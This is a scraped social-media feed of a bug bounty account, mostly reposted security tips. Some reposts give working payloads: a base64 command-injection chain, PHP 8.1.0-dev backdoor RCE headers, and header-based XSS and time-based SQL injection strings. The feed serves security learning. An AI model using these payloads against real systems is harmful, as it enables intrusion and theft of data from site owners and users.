BugBountyTools's profile picture. http://t.me/BugBountyTool
🛠️ + 🔬 = ❌
🧠 + 🔬 = 🐛 💵
🧠 + 🔬 + 🛠️   = 🐛🐛💰💰

Cyber Security Tools - Ethical Hacking

Bug Bounty Tools 🛠

@BugBountyTools

http://t.me/BugBountyTool 🛠️ + 🔬 = ❌ 🧠 + 🔬 = 🐛 💵 🧠 + 🔬 + 🛠️ = 🐛🐛💰💰 Cyber Security Tools - Ethical Hacking

Pinned

🚨 Alerte #DataProtection! La plateforme pappers.fr @get_pappers expose trop de nos données personnelles. Ma signature et mon adresse sont accessibles d'un simple clic sur Google. Pourquoi ces infos sont-elles si facilement disponibles?@cnil @cnil_eu #CNIL #RGPD

BugBountyTools's tweet image. 🚨 Alerte #DataProtection! 

La plateforme pappers.fr @get_pappers expose trop de nos données personnelles. 
Ma signature et mon adresse sont accessibles d'un simple clic sur Google. Pourquoi ces infos sont-elles si facilement disponibles?@cnil @cnil_eu #CNIL #RGPD

Bug Bounty Tools 🛠 reposted

I’m so sick of these dickheads. Meanwhile, I’m trying to report massive data breaches to orgs who aren’t replying because they get so much crap like Sam’s!

troyhunt's tweet image. I’m so sick of these dickheads. Meanwhile, I’m trying to report massive data breaches to orgs who aren’t replying because they get so much crap like Sam’s!

Bug Bounty Tools 🛠 reposted

🔥Best IDOR Checklist #infosec #cybersec #bugbountytips #BugBounty

wtf_brut's tweet image. 🔥Best IDOR Checklist 

#infosec #cybersec #bugbountytips #BugBounty

Bug Bounty Tools 🛠 reposted

.@insiderPhD's beginners guide to finding #IDORs 👇 #bugbountytips


Bug Bounty Tools 🛠 reposted

🧵 Welcome to Day 19 of the Secure Code Review Series! Today, we’re diving into Insufficient Logging and Monitoring—a silent but critical vulnerability that can make or break your ability to detect and respond to attacks. Let’s learn how to spot weak logging practices and…

sec_r0's tweet image. 🧵 Welcome to Day 19 of the Secure Code Review Series!

Today, we’re diving into Insufficient Logging and Monitoring—a silent but critical vulnerability that can make or break your ability to detect and respond to attacks. Let’s learn how to spot weak logging practices and…

Bug Bounty Tools 🛠 reposted
KN0X55's tweet image. #XSS #WAF #Bypass

Bug Bounty Tools 🛠 reposted

Command injection with no spaces and no outbound? 1. base64 a complex command locally 2. {shuf,-e,"$b64",-o,$file} 3. {openssl,base64,-d,-in,$file,-out,$script} 4. {bash,$script} - gtfobins.github.io/#+file%20write #infosec #cybersec #bugbountytips


Bug Bounty Tools 🛠 reposted

HackerOne disclosed a bug submitted by @haxta4ok: hackerone.com/reports/1618347 - Bounty: $25,000 #hackerone #bugbounty

disclosedh1's tweet image. HackerOne disclosed a bug submitted by @haxta4ok: hackerone.com/reports/1618347 - Bounty: $25,000 #hackerone #bugbounty

Bug Bounty Tools 🛠 reposted

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); Post by:- @0x0SojalSec #bugbountytips #infosec #bugbounty #bugbountytip #hacking #hacker #cybersecurity

viehgroup's tweet image. If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

Post by:- @0x0SojalSec 
#bugbountytips #infosec #bugbounty #bugbountytip #hacking #hacker #cybersecurity

Bug Bounty Tools 🛠 reposted

Day 4 & 5 : RCE - CVE-2024-9593 Link : github.com/RandomRobbieBF…

h4x0r_fr34k's tweet image. Day 4 & 5 : RCE - CVE-2024-9593

Link : github.com/RandomRobbieBF…

Bug Bounty Tools 🛠 reposted

Header based injection: X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)> X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Referer:…


Bug Bounty Tools 🛠 reposted

Try this powerful XSS bypass. Many WAFs have not blacklisted this event handler, so you can take advantage of it

coffinxp7's tweet image. Try this powerful XSS bypass. Many WAFs have not blacklisted this event handler, so you can take advantage of it

Bug Bounty Tools 🛠 reposted

Exactly!

7h3h4ckv157's tweet image. Exactly!

Bug Bounty Tools 🛠 reposted

Reverse-engineering DLLs requires the right tools to uncover vulns. 4 tools for hacking DLLs 🧵👇

Bugcrowd's tweet image. Reverse-engineering DLLs requires the right tools to uncover vulns.

4 tools for hacking DLLs 🧵👇

Bug Bounty Tools 🛠 reposted

Actually yes, we saw a case of that same lure earlier this week. :) Cutesy copy-pasta, I am trying to weight if it is worth a video or not 😅

_JohnHammond's tweet image. Actually yes, we saw a case of that same lure earlier this week. :) Cutesy copy-pasta, I am trying to weight if it is worth a video or not 😅

Bug Bounty Tools 🛠 reposted

try this extension to detect all types of SQLi+WAFBypass payloads just copy and try manully or you can use intruder for testing timebased sqli just set to resource pool to 1 conqurent request and check the response delay..

coffinxp7's tweet image. try this extension to detect all types of SQLi+WAFBypass payloads just copy and try manully or you can use intruder for testing timebased sqli just set to resource pool to 1 conqurent request and check the response delay..

Bug Bounty Tools 🛠 reposted

The client-side hackers toolkit: 1⃣ DevTools 2⃣ DOM Logger++ 3⃣ DOM Invader or EvalVillian 4⃣ de4js.kshift.me 5⃣ Humanify 6⃣ JSWZL lot's to learn!


Bug Bounty Tools 🛠 reposted

🔥 XSS on any website with missing charset information? 😳 Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post: sonarsource.com/blog/encoding-… #appsec #security #vulnerability

Sonar_Research's tweet image. 🔥 XSS on any website with missing charset information? 😳

Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post:

sonarsource.com/blog/encoding-…

#appsec #security #vulnerability

Bug Bounty Tools 🛠 reposted

Sql injection ⚔️ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Sql injection ⚔️

#infosec #cybersec #bugbountytips

Loading...

Something went wrong.


Something went wrong.